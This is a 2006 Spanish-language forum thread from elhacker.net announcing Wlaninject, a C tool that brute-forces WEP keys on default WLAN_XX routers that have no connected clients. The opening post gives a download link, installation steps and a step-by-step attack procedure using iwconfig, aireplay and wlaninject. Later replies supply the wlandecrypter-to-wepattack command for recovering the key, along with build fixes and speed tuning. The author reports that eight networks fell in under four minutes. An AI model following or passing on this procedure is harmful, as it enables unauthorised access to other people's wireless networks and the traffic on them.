Foro de elhacker.net

Seguridad Informática => Wireless en Linux => Mensaje iniciado por: nilp0inter en 11 Diciembre 2006, 08:06 am



Título: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: nilp0inter en 11 Diciembre 2006, 08:06 am
Wlaninject es un programa capaz de generar bajo ciertas condiciones un paquete ARP proveniente del router atacado. Esto es útil cuando no hay clientes conectados y necesitamos un paquete para realizar un ataque de diccionario con (wepattack|weplab|aircrack)+wlandecrypter.
El tiempo estimado del ataque son unos 4 minutos pero en condiciones optimas de señal se puede hacer en menos.

http://www.fuerzaiberica.com/nil/rusoblanco/descargas/wlaninject-0.6.tar.gz (http://www.fuerzaiberica.com/nil/rusoblanco/descargas/wlaninject-0.6.tar.gz)

Página oficial: http://www.fuerzaiberica.com/nil/rusoblanco/index.php?q=node/64 (http://www.fuerzaiberica.com/nil/rusoblanco/index.php?q=node/64)

Instalación
Lo bajamos y en una consola situada en el directorio de bajada tecleamos:
Código:
tar -zxvf wlaninject-?.?.tar.gz
cd wlaninject-?.?
make
make install
El ultimo paso es necesario como root y solo si lo quereis instalar permanentemente.

El ejecutable se copia a /usr/local/sbin

Modo de uso
1) Nos conectamos a la red a descifrar con una contraseña cualquiera. Y nos ponemos una ip dentro del rango 192.168.1.0/24:
Código:
iwconfig {INTERFAZ} channel {CANAL}
iwconfig {INTERFAZ} essid {NOMBRE_DE_LA_RED}
iwconfig {INTERFAZ} ap {MAC_DE_LA_RED}
iwconfig {INTERFAZ} key s:AAAAAAAAAAAAA
ifconfig {INTERFAZ} 192.168.1.250 up      <--- ESTE ES IFCONFIG CON EFE !!
Si tenemos buena señal de la red usaremos estos comandos para tener más ancho de banda en la conexión y que el proceso acabe mucho antes:
Código:
iwlist {INTERFAZ} rate    <--- Al ejecutarlo nos dirá las velocidades que acepta la red y nuestra tarjeta, apuntamos la más grande (ej. 36M)
iwconfig {INTERFAZ} rate {VELOCIDAD}   <--- Aqui obligamos a que la conexión sea a la máxima velocidad disponible
Por otro lado, si la señal es pobre utilizaremos este comando para garantizar que llega el máximo número de paquetes (aunque el ataque sea mas lento):
Código:
iwconfig {INTERFAZ} rate 1M
2) Una vez conectados abriremos una consola y ejecutamos:
Código:
aireplay -4 -b {BSSID} -f1 {INTERFAZ}
Para capturar la respuesta del AP cuando mandemos el ARP cifrado con la contraseña correcta.
3) Ejecutar wlaninject con la siguiente sintaxis:
Código:
   wlaninject 0.? - (c) 2006 nilp0inter2k6_at_gmail.com
  ------------>  http://www.rusoblanco.com  <------------

 [i] modo de uso: wlaninject < -b BSSID > < -e ESSID > < -i INTERFAZ >
     -b   BSSID
     -e   ESSID
     -i   INTERFAZ

Ejemplo:
Para una red con ESSID=\"WLAN_35\" y BSSID= \"00:60:B3:XX:XX:XX\" ejecutariamos:
Código:
wlaninject -e WLAN_35 -b 00:60:B3:XX:XX:XX -i ath0
4) Durante el proceso, si todo ha salido bien, aparecerá en la ventana en la que estamos ejecutando el aireplay un paquete de datos, pulsamos y o s (según la versión) para que se guarde y a continuación Ctrl-C en la ventana de aireplay y en la de wlaninject.
El paquete se habrá guardado con un nombre parecido a este: replay_arp-XXXX-XXXXXX.cap.


Muchas gracias a axi por arreglar mis cagadas con libnet xD


Saludos y que lo disfruteis.


TODO:
  • Añadir función para que pare de enviar si se desconecta. HECHO
  • Función para el cálculo de rate. HECHO (Hay que mejorarlo)
  • Comprobar que la conexión es correcta y la ip esta dentro del rango
  • Reescribir todo el código. ES UNA CHAPUZA!!

Post original
Citar
Hola, se me ha ocurrido hoy una idea y quería preguntaros que os parece (estareis pensando que que pesado estoy con las WLAN... y vuelta la burra al trigo, no? xD).

Para los que no conozcan como descifrar descifrar* WLAN_XX sin paquetes y sin clientes os diré que hay un script para linux aqui : http://foro.elhacker.net/index.php/topic,126683.0.html (http://foro.elhacker.net/index.php/topic,126683.0.html).

Los que ya conoceis esta técnica sabreis que es bastante burra (mandar un arp cifrado con las 65565 posibles claves una tras otra hasta obtener respuesta); lo que se me ha ocurrido es que hay dos posibilidades para hacerlo más rápido (estoy hablando de hacerlo en 3-4 minutos en vez de 20 ó 30  :o ) :

  • El mismo método implementado en C: Con lo que ganaría mucha velocidad ya que no tendría que llamar a iwconfig cada vez que quiere cambiar la clave y a arping2 cada vez que quiere enviar un paquete arp, etc; usariamos directamente la api y sockets.
  • Usar el siguiente método tambien en C: En vez de hacer un bucle que cambie la key y llame a la rutina de enviar un arp podríamos generar un arp, y copiarlo a un fichero en memoria 65565 veces cifrado con cada una de las claves y luego enviarlos por el interfaz raw que tienen las atheros directamente con los que nos quitariamos estar cambiando la clave todo el rato.

Este segundo método es sólo teórico, es decir, no se exactamente si se puede hacer tal y como digo... pero me parece una buena idea.
Quería preguntaros a los máquinas de esto que si os parece buena idea y si lo veis factible.

Bueno ¿Qué me decis? Si veis que me rayo me lo borrais xD y aqui santas pascuas.


* Como lei el otro dia en una web muy interesante descifrar es sacar algo de una cripta xD... mejor descifrar


Título: Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NU
Publicado por: rh3nt0n en 11 Diciembre 2006, 12:12 pm
todo lo que sea ir palante bienvenido sea .. en lo que timofononica no tenga en cuenta tu trabajo respecto a sus redes inalambricas y su 'seguridad'  tus aplicaciones y metodos para WLAN_XX  siguen siendo de los mas usados y mas efecivos en lo que a su brevedad en el descifrado se refiere ..

a mi me parece perfecto .. el problema es no tener ni pajolera idea de C para poder ayudar  :-\ .. y te aseguro que no sera por ganas...

saludos


Título: Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NU
Publicado por: Armenos en 11 Diciembre 2006, 12:14 pm
Tal como mi compañero rh3nt0n de C yo tampoco sé nada, pero ayudar se ayudará en todo lo que se pueda. Yo voto a favor de intentar descifrar las WLAN probando el nuevo método. Saludos.


Título: Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NU
Publicado por: NeoXhk en 11 Diciembre 2006, 13:39 pm
.... (estareis pensando que que pesado estoy con las WLAN... y vuelta la burra al trigo, no? xD).


para nada, adelante...!!!  :D


Título: Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NUEVO
Publicado por: pianista en 11 Diciembre 2006, 15:43 pm
Creo que una idea genial seria generar todos los arps posibles dado que asi nos evitamos problemas con el arping...
En cuanto a C no se mucho pero vamos que te puedo intentar ayudar muy poquito, aun soy novato en programacion jejeje
Saludoss


Título: Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NU
Publicado por: Armenos en 11 Diciembre 2006, 15:46 pm
Creo que una idea genial seria generar todos los arps posibles dado que asi nos evitamos problemas con el arping...
En cuanto a C no se mucho pero vamos que te puedo intentar ayudar muy poquito, aun soy novato en programacion jejeje
Saludoss

No le vale el programa Hola mundo, que lo sepas ;D Saludos.

P.d. Yo todavía ni estoy a ese nivel jejeje


Título: Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NUEVO
Publicado por: pianista en 11 Diciembre 2006, 15:48 pm
Armenos armenos que te meto en un bucle infinito y no sales de ahi... ;)
Por cierto yo no haria el hola mundo, haria el hola wifi!!
Saludoss


Título: Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NU
Publicado por: Armenos en 11 Diciembre 2006, 15:54 pm
Armenos armenos que te meto en un bucle infinito y no sales de ahi... ;)
Por cierto yo no haria el hola mundo, haria el hola wifi!!
Saludoss

Siempre innovando... La envidia me corroe :) Saludos.

P.d. If iwconfig armenos modo malvado then the world will crash ;)


Título: Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NUEVO
Publicado por: Elena_FranciX en 11 Diciembre 2006, 18:16 pm
Tu rayate lo que haga falta y no te rayes solo en Linux (Gento) y Windows, rayate para Zaurus y Maemo (Nokia N-770)

Trataremos de seguir las lecturas, los profanos en programación (un 10 por el "nuevo" WLAN 0´5 y corecciones)
 ;D


Título: Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NU
Publicado por: nilp0inter en 19 Diciembre 2006, 15:29 pm
Ok, os anuncio que ya está implementado en C con el primer método que expliqué y atención, tarda nada menos que 4 minutos en enviar los ARP con todas las combinaciones.  :o

Esta noche lo publicaré para que lo probeis.

Saludos!  ;D

P.D: Se os ocurre algún buen nombre para el programa??, ya sabeis que no se me dan bien xD


Título: Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NU
Publicado por: rh3nt0n en 19 Diciembre 2006, 15:40 pm
WLAN_KO ??? me pareceria perfecto .. ;D ;D ;D

ganas de probarlo .. ;)


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: nilp0inter en 19 Diciembre 2006, 22:28 pm
Acabo de actualizar el primer post, ahi teneis toda la info.

Saludos!


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: insig en 19 Diciembre 2006, 22:33 pm
Voy a probarlo. Gracias.  :D


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: pianista en 20 Diciembre 2006, 00:00 am
Enhorabuena nil0pointer tus aportaciones siguen siendo excelents, a ver si lo pruebo pronto ;)
Saludosss


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: nilp0inter en 20 Diciembre 2006, 17:22 pm
Enhorabuena nil0pointer tus aportaciones siguen siendo excelents, a ver si lo pruebo pronto ;)
Saludosss

Gracias.

Ya lo he probado en 8 redes y todas han caido en menos de 4 minutos, el fastmode solo me ha funcionado en 1.

Cuando lo probeis comentadme los resultados.

Saludos!


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: rh3nt0n en 20 Diciembre 2006, 17:26 pm
no me compila ....

Código:
wlaninject-0.1 # make
gcc   -Os -I. -lnet -lpcap -MMD    -o wlaninject wlaninject.o libiw.so.28 -lm
wlaninject.o(.text+0x208): In function `do_libnet_init':
: undefined reference to `libnet_destroy'
wlaninject.o(.text+0x246): In function `do_libnet_init':
: undefined reference to `libnet_init'
wlaninject.o(.text+0x3a5): In function `main':
: undefined reference to `libnet_addr2name4'
wlaninject.o(.text+0x3f3): In function `main':
: undefined reference to `pcap_open_live'
wlaninject.o(.text+0x41d): In function `main':
: undefined reference to `pcap_compile'
wlaninject.o(.text+0x437): In function `main':
: undefined reference to `pcap_setfilter'
wlaninject.o(.text+0x45c): In function `main':
: undefined reference to `libnet_get_hwaddr'
wlaninject.o(.text+0x46e): In function `main':
: undefined reference to `libnet_geterror'
wlaninject.o(.text+0x494): In function `main':
: undefined reference to `libnet_get_ipaddr4'
wlaninject.o(.text+0x4a8): In function `main':
: undefined reference to `libnet_geterror'
wlaninject.o(.text+0xa8d): In function `main':
: undefined reference to `libnet_build_arp'
wlaninject.o(.text+0xaa3): In function `main':
: undefined reference to `libnet_geterror'
wlaninject.o(.text+0xae5): In function `main':
: undefined reference to `libnet_build_ethernet'
wlaninject.o(.text+0xafb): In function `main':
: undefined reference to `libnet_geterror'
wlaninject.o(.text+0xb38): In function `main':
: undefined reference to `libnet_write'
wlaninject.o(.text+0xb47): In function `main':
: undefined reference to `libnet_geterror'
collect2: ld returned 1 exit status
make: *** [wlaninject] Error 1

alguna idea ??


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: nilp0inter en 20 Diciembre 2006, 17:39 pm
no me compila ....

Código:
wlaninject-0.1 # make
gcc   -Os -I. -lnet -lpcap -MMD    -o wlaninject wlaninject.o libiw.so.28 -lm
wlaninject.o(.text+0x208): In function `do_libnet_init':
: undefined reference to `libnet_destroy'
wlaninject.o(.text+0x246): In function `do_libnet_init':
: undefined reference to `libnet_init'
wlaninject.o(.text+0x3a5): In function `main':
: undefined reference to `libnet_addr2name4'
wlaninject.o(.text+0x3f3): In function `main':
: undefined reference to `pcap_open_live'
wlaninject.o(.text+0x41d): In function `main':
: undefined reference to `pcap_compile'
wlaninject.o(.text+0x437): In function `main':
: undefined reference to `pcap_setfilter'
wlaninject.o(.text+0x45c): In function `main':
: undefined reference to `libnet_get_hwaddr'
wlaninject.o(.text+0x46e): In function `main':
: undefined reference to `libnet_geterror'
wlaninject.o(.text+0x494): In function `main':
: undefined reference to `libnet_get_ipaddr4'
wlaninject.o(.text+0x4a8): In function `main':
: undefined reference to `libnet_geterror'
wlaninject.o(.text+0xa8d): In function `main':
: undefined reference to `libnet_build_arp'
wlaninject.o(.text+0xaa3): In function `main':
: undefined reference to `libnet_geterror'
wlaninject.o(.text+0xae5): In function `main':
: undefined reference to `libnet_build_ethernet'
wlaninject.o(.text+0xafb): In function `main':
: undefined reference to `libnet_geterror'
wlaninject.o(.text+0xb38): In function `main':
: undefined reference to `libnet_write'
wlaninject.o(.text+0xb47): In function `main':
: undefined reference to `libnet_geterror'
collect2: ld returned 1 exit status
make: *** [wlaninject] Error 1

alguna idea ??

Necesitas la libnet, si tienes una distribución basada en debian prueba
Código:
apt-get install libnet1 libnet1-dev

Saludos!


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: rh3nt0n en 20 Diciembre 2006, 17:47 pm
ya lo imaginaba ;)


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: rh3nt0n en 20 Diciembre 2006, 18:08 pm
Código:
/wlaninject-0.1$ make
gcc -Os -I. -lnet -lpcap -MMD    -c wlaninject.c
wlaninject.c:39:18: aviso: pcap.h: No existe el fichero ó directorio
wlaninject.c: En la función ‘main’:
wlaninject.c:429: error: ‘PCAP_ERRBUF_SIZE’ no se declaró aquí (primer uso en esta función)
wlaninject.c:429: error: (Cada identificador no declarado solamente se reporta una vez
wlaninject.c:429: error: para cada funcion en la que aparece.)
wlaninject.c:441: error: no se conoce el tamaño de almacenamiento de ‘bp’
wlaninject.c:442: error: ‘pcap_t’ no se declaró aquí (primer uso en esta función)
wlaninject.c:442: error: ‘pcap’ no se declaró aquí (primer uso en esta función)
wlaninject.c:619: aviso: se pasa el argumento 1 de ‘sprintf’ desde un tipo de puntero incompatible
wlaninject.c:621: aviso: el paso del argumento 3 de ‘set_key’ descarta los calificadores del tipo del destino del puntero
wlaninject.c:626: aviso: el puntero que apunta en el paso del argumento 1 de ‘pingip_send’ difiere en signo
wlaninject.c:626: aviso: el puntero que apunta en el paso del argumento 2 de ‘pingip_send’ difiere en signo
make: *** [wlaninject.o] Error 1

 :rolleyes:  :o  libpcap ?? :)

va a ser que si :)


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: nilp0inter en 20 Diciembre 2006, 18:18 pm
Código:
/wlaninject-0.1$ make
gcc -Os -I. -lnet -lpcap -MMD    -c wlaninject.c
wlaninject.c:39:18: aviso: pcap.h: No existe el fichero ó directorio
wlaninject.c: En la función ‘main’:
wlaninject.c:429: error: ‘PCAP_ERRBUF_SIZE’ no se declaró aquí (primer uso en esta función)
wlaninject.c:429: error: (Cada identificador no declarado solamente se reporta una vez
wlaninject.c:429: error: para cada funcion en la que aparece.)
wlaninject.c:441: error: no se conoce el tamaño de almacenamiento de ‘bp’
wlaninject.c:442: error: ‘pcap_t’ no se declaró aquí (primer uso en esta función)
wlaninject.c:442: error: ‘pcap’ no se declaró aquí (primer uso en esta función)
wlaninject.c:619: aviso: se pasa el argumento 1 de ‘sprintf’ desde un tipo de puntero incompatible
wlaninject.c:621: aviso: el paso del argumento 3 de ‘set_key’ descarta los calificadores del tipo del destino del puntero
wlaninject.c:626: aviso: el puntero que apunta en el paso del argumento 1 de ‘pingip_send’ difiere en signo
wlaninject.c:626: aviso: el puntero que apunta en el paso del argumento 2 de ‘pingip_send’ difiere en signo
make: *** [wlaninject.o] Error 1

 :rolleyes:  :o  libpcap ?? :)


Pues si xD


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: *dudux en 20 Diciembre 2006, 18:50 pm
lo que yo necesitaba......... :rolleyes:

que grande! muy buena nil  ;).........



Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: hachino en 20 Diciembre 2006, 21:23 pm

Ya estamos preparando un live-cd. ;)
LO ESPERAMS ansiosos


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: odbk en 21 Diciembre 2006, 00:03 am
No se si me salgo del tema pero como queda esto en windows? osea lo de wlan_Xx sin clientes asociados es que hoy me he dao uan vuelta y de unas diez que me han salido todas sin clientes asociados

Gracias por todo nilp0inter, espero que te todo el apoyo que te muestran aqui te anime a seguir haciendo mas cosillas :D


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: nilp0inter en 21 Diciembre 2006, 00:55 am
No se si me salgo del tema pero como queda esto en windows? osea lo de wlan_Xx sin clientes asociados es que hoy me he dao uan vuelta y de unas diez que me han salido todas sin clientes asociados

Gracias por todo nilp0inter, espero que te todo el apoyo que te muestran aqui te anime a seguir haciendo mas cosillas :D

Estamos pensando en hacer una versión para windows, pero en principio se necesitarian dos tarjetas wireless

Saludos ;)


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: odbk en 21 Diciembre 2006, 01:31 am
oki estare al tanto ahora estoy intentanndo con wifislax y troppix pero nada no consigo ni asociarme cago en la p**a xD,

Abusando un poco una duda que me surge he visto que con aireplay puedes injectar trafico indicando solo el essid y bssid y se genera ivs validos (no se como cojones) no es mas facil injectar un poco con aireplay y recoger un iv valido de los que responde el ap


Saludos de nuevo tronko me vas a coger mania xD


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: nilp0inter en 21 Diciembre 2006, 01:34 am
oki estare al tanto ahora estoy intentanndo con wifislax y troppix pero nada no consigo ni asociarme cago en la p**a xD,

Abusando un poco una duda que me surge he visto que con aireplay puedes injectar trafico indicando solo el essid y bssid y se genera ivs validos (no se como cojones) no es mas facil injectar un poco con aireplay y recoger un iv valido de los que responde el ap


Saludos de nuevo tronko me vas a coger mania xD

Yo he creado la herramienta porque no he conseguido sacar arps de manera rapido con el aireplay en redes de este tipo sin clientes de ningun tipo.

De que manera dices lo de los arp?? con el ataque 1+3?



Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: odbk en 21 Diciembre 2006, 01:55 am
ahn ok duda resuelta perdona mi ignorancia llevo poco con el crackeo de wifis, entonces como yo decia se tarda muchisimo en conseguir un IV valido yo crei qeu con el aireplay nada mas injectar un paquete recibias otro valido por eso pense que en nada de tiempo se tendra un IV valido y luego wlandecrypter y wepattack


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: nilp0inter en 21 Diciembre 2006, 02:47 am
ahn ok duda resuelta perdona mi ignorancia llevo poco con el crackeo de wifis, entonces como yo decia se tarda muchisimo en conseguir un IV valido yo crei qeu con el aireplay nada mas injectar un paquete recibias otro valido por eso pense que en nada de tiempo se tendra un IV valido y luego wlandecrypter y wepattack

Nada a mandar, tambien te digo que yo te hablo desde mi experiencia, lo mismo me equivoco.

Saludos!


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: hachino en 21 Diciembre 2006, 17:22 pm
Buenas me descargo el libnet (wget...) lo descomprimo (tar...) pero cuando pongo:

hwagm ~ # apt-get install libnet1 libnet1-dev
-bash: apt-get: command not found
hwagm ~ #               
         

me dice q no lo encuentra, donde se ubica libnet? me salto algo?

gracias x adelantado


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: nilp0inter en 21 Diciembre 2006, 17:30 pm
Buenas me descargo el libnet (wget...) lo descomprimo (tar...) pero cuando pongo:

hwagm ~ # apt-get install libnet1 libnet1-dev
-bash: apt-get: command not found
hwagm ~ #               
         

me dice q no lo encuentra, donde se ubica libnet? me salto algo?

gracias x adelantado

Que distribución usas?


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: *dudux en 21 Diciembre 2006, 17:47 pm
usa wifislax 1.1 ....no?

En distribuciones basadas en Slax no existe el gestor de instalación  de paquetes de debian (apt-get)   :(

Pero nunca instale nada en Slax........habra que buscar!


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: ZariK en 21 Diciembre 2006, 18:07 pm
Wenas, ya tengo el paquete replayxxxx.cap lo uso cn el wepattack para que sake la clave no? Ncsito generar un fixero claves cn el wlandecrypter anteriormente no?

Saludos


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 segundos. ;)
Publicado por: nilp0inter en 21 Diciembre 2006, 18:11 pm
Wenas, ya tengo el paquete replayxxxx.cap lo uso cn el wepattack para que sake la clave no? Ncsito generar un fixero claves cn el wlandecrypter anteriormente no?

Saludos

Ahora que tienes el paquete ejecuta:
Código:
wlandecrypter {BSSID} {ESSID} | wepattack -f replayxxxx.cap


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 minutos. ;)
Publicado por: hachino en 21 Diciembre 2006, 20:08 pm
nilp0inter , uso Live cd Wifislax 1.1 - beta acertastes dudux  :rolleyes:

gracias :D


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 minutos. ;)
Publicado por: axi en 22 Diciembre 2006, 01:17 am
Hola nilp0inter,
soy nuevo por estos lares y no conocía tu herramienta, es increíble como gente cacharrera saca estas cosas. No he leído los post del hilo, pero me he bajado el código directamente para echarle un vistazo. Madre mía! el objetivo era que funcionara como fuera eh? ;-)

Un pequeño error de despiste,
Así a ojo, sin haber usado el programa te comento que la inicialización de libinit siempre la realizas sobre la interfaz "ath0", ignorando el valor posterior de optarg en getopt. Así que deberias parsear los valores de linea de comandos antes de la  inicialización. Supongo que tú habrás usado siempre la interfaz ath0 y por eso no habrás tenido problemas.
El método este me ha picado la curiosidad y mañana haré unas pruebas analizando el tráfico generado por tu herramienta, ya te comentaré lo que vea.

Un Saludo,


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 minutos. ;)
Publicado por: hachino en 22 Diciembre 2006, 02:48 am
*dudux cual usas tu? ya q con wifislax 1.1 no tengo nada q hacer :S un saludo


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 minutos. ;)
Publicado por: nilp0inter en 22 Diciembre 2006, 04:44 am
Hola nilp0inter,
soy nuevo por estos lares y no conocía tu herramienta, es increíble como gente cacharrera saca estas cosas. No he leído los post del hilo, pero me he bajado el código directamente para echarle un vistazo. Madre mía! el objetivo era que funcionara como fuera eh? ;-)

Un pequeño error de despiste,
Así a ojo, sin haber usado el programa te comento que la inicialización de libinit siempre la realizas sobre la interfaz "ath0", ignorando el valor posterior de optarg en getopt. Así que deberias parsear los valores de linea de comandos antes de la  inicialización. Supongo que tú habrás usado siempre la interfaz ath0 y por eso no habrás tenido problemas.
El método este me ha picado la curiosidad y mañana haré unas pruebas analizando el tráfico generado por tu herramienta, ya te comentaré lo que vea.

Un Saludo,

Jajaja, como me has calado... xD Pues si, el objetivo era publicarlo antes de navidad, por lo de las vacaciones y eso. Ya habrá tiempo para las correcciones y para limpiar el codigo spageti.
Respecto a lo de la libnet tienes toda la razón, no me había fijado. mañana lo corrijo.

Salugos, y ya sabes, todo lo que veas viene bien, 4 ojos valen más que 2.

Gracias


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 minutos. ;)
Publicado por: *dudux en 22 Diciembre 2006, 13:02 pm
nilp0inter , uso Live cd Wifislax 1.1 - beta acertastes dudux  :rolleyes:

gracias :D

estaba claro :rolleyes:

*dudux cual usas tu? ya q con wifislax 1.1 no tengo nada q hacer :S un saludo

pq no tienes nada que hacer??? no te entiendo!
yo uso a la vieja escuela "troppix 1.2" aunque ahora ando "mudando" a WifiSlax 1.2................


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 minutos. ;)
Publicado por: nilp0inter en 22 Diciembre 2006, 13:56 pm
nilp0inter , uso Live cd Wifislax 1.1 - beta acertastes dudux  :rolleyes:

gracias :D

A ver si tengo tiempo y me la bajo y lo pruebo, es que no se de que herramientas dispone la distro.

A, por cierto, he cambiado unas cosillas en el post principal, se me olvido deciros que cuando os conectais a la red teneis que poneros una ip del rango 192.168.1.0/24. Bueno... ya he arreglado la cagada de la libnet y luego lo subo.

Saludos


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 minutos. ;)
Publicado por: odbk en 22 Diciembre 2006, 14:55 pm
Ami me da un error al ejecutarlo en libnet1_init ()  incluso al ejecutarlo si parametros para ver el help, no creo que sea debido a lo que contaban arriba

Bueno saludos y gracias a los que dedicais un poco de tiempo a estas cosas tanto a resolver dudas como a crear soft


Título: Re: Wlaninject. WLAN_XX sin clientes, sin paquetes en 4 minutos. ;)
Publicado por: nilp0inter en 22 Diciembre 2006, 17:20 pm
Ami me da un error al ejecutarlo en libnet1_init ()  incluso al ejecutarlo si parametros para ver el help, no creo que sea debido a lo que contaban arriba

Bueno saludos y gracias a los que dedicais un poco de tiempo a estas cosas tanto a resolver dudas como a crear soft

Prueba ahora, que he subido la 0.2 que creo que ya estará arreglada


Título: Re: Wlaninject 0.2 - WLAN_XX sin clientes, en 4 minutos. Cagada de libnet arreglá
Publicado por: odbk en 22 Diciembre 2006, 21:34 pm
ummm
me he bajao la version nueva la 0.2 de WWW.rusoblanco.com he seguido las modificaciones del post y me ha salido esto

root@troppix:~ wlaninject -b xx:xx:xx:xx:xx:xx -e WLAN_BF -i ath0 -f
wlaninject: libnet_get_ipaddr4(libnet):libnet_get_ipaddr4(): ioctl(): Cannot as sign request address


Saludos


Título: Re: Wlaninject 0.2 - WLAN_XX sin clientes, en 4 minutos. Cagada de libnet arregl
Publicado por: nilp0inter en 22 Diciembre 2006, 22:23 pm
ummm
me he bajao la version nueva la 0.2 de WWW.rusoblanco.com he seguido las modificaciones del post y me ha salido esto

root@troppix:~ wlaninject -b xx:xx:xx:xx:xx:xx -e WLAN_BF -i ath0 -f
wlaninject: libnet_get_ipaddr4(libnet):libnet_get_ipaddr4(): ioctl(): Cannot as sign request address


Saludos

te has puesto la ip??

Código:
ifconfig ath0 192.168.1.250 up


Título: Re: Wlaninject 0.2 - WLAN_XX sin clientes, en 4 minutos. Cagada de libnet arreglá
Publicado por: odbk en 22 Diciembre 2006, 23:00 pm
ponia iwconfig ath0 ip up  ;D me vas a zumbar por dar tanto por culo jejeje joder es que era todo con iwconfig y me extraño lo de ifconfig


Título: Re: Wlaninject 0.2 - WLAN_XX sin clientes, en 4 minutos. Cagada de libnet arregl
Publicado por: nilp0inter en 22 Diciembre 2006, 23:19 pm
ponia iwconfig ath0 ip up  ;D me vas a zumbar por dar tanto por culo jejeje joder es que era todo con iwconfig y me extraño lo de ifconfig

xD


Título: Re: Wlaninject 0.2 - WLAN_XX sin clientes, en 4 minutos. Cagada de libnet arregl
Publicado por: axi en 23 Diciembre 2006, 04:41 am
Hola nilp0inter,

He hecho unas pruebas con tu progama sin ningún router de imagenio, asi que no puedo probar su eficacia. Sin embargo, he analizado un poco su comportamiento.
En el modo que tú denominas fast mode, no haces ninguna pausa entre el envio de cada paquete, en el modo normal, en concreto realizas una pausa teórica de 1us ( digo teórica, porque normalmente no se cumple,siendo bastante mayor ).

Pese a que comentabas métodos para realizar más rápido el envío, el cuello de botella está en la tarjeta y en el medio inalámbrico, esto es, la tarjeta en modo fast ya está más que sobrecargada y la tarjeta no envia todas las tramas que el programa especifica porque le llenas los buffers al ir demasiado deprisa y las descarta. Además, puede haber varios AP en el mismo canal o estaciones emitiendo que harían que las tramas colisionaran, o cuando menos ocurriera algun retardo en la emisión.
Por otro lado, con pausas mediante la función usleep en cada paquete probablemente estemos desaprovechando mucho tiempo.

Para ver el tiempo desaprovechado, realice la prueba de capturar la cantidad de tramas que se llegaban a emitir en fast mode, y me salian unas 10000, muy alejadas de las 65536 que deberían aparecer. Fijándome en los tiempos entre trama, eran de aproximadamente 0.4us. Lo cual quería decir que se podia enviar una trama esperando como mínimo 0.4us, sin embargo lograr esta precisión programando ( pese a que existe la función nanosleep ) es harto difícil, así que probé un pequeño hack, cutre, que se basa en llenar el buffer de envio y esperar 1 us, haciendo asi un envío a ráfagas.

Por ejemplo, si especificamos el factor 10, cada 10 paquetes se espera 1us, con lo que nos tarda aprox 30s en total, y nos envia 50 y pico mil tramas, no todas, pero casi todas, aumentando la probabilidad de exito muchisimo más que con 10 mil y aumentando tambien mucho la velocidad porque esperamos cada 10 tramas, con este valor podeis jugar lo que querais.
Resumiendo, cuanto mayor es el factor, menos tramas se envian pero más rápido lo realiza. No es un avance tampoco muy grande, porque esperando con cada trama se tardan los 4 minutos que no es mucho tiempo.
Ejemplo :
wlaninject -e WLAN_35 -b 00:60:B3:XX:XX:XX -i ath0 -f 10
wlaninject -e WLAN_35 -b 00:60:B3:XX:XX:XX -i ath0 -f 25
wlaninject -e WLAN_35 -b 00:60:B3:XX:XX:XX -i ath0

sin -f  es que pare en cada paquete, es equivalente a
wlaninject -e WLAN_35 -b 00:60:B3:XX:XX:XX -i ath0 -f 1

Tengo el parche en diff unificado, simplemente copiarlo en el directorio del programa y aplicarlo con patch -i parche_factor.diff
Lo postearia aquí, pero no tengo ni idea de si tengo privilegios o cómo hacerlo, estos foros con tantos dibujitos me descolocan. Así que te lo envío al correo y tú verás si te interesa agregarlo o no.

nilp0inter sobre el código,
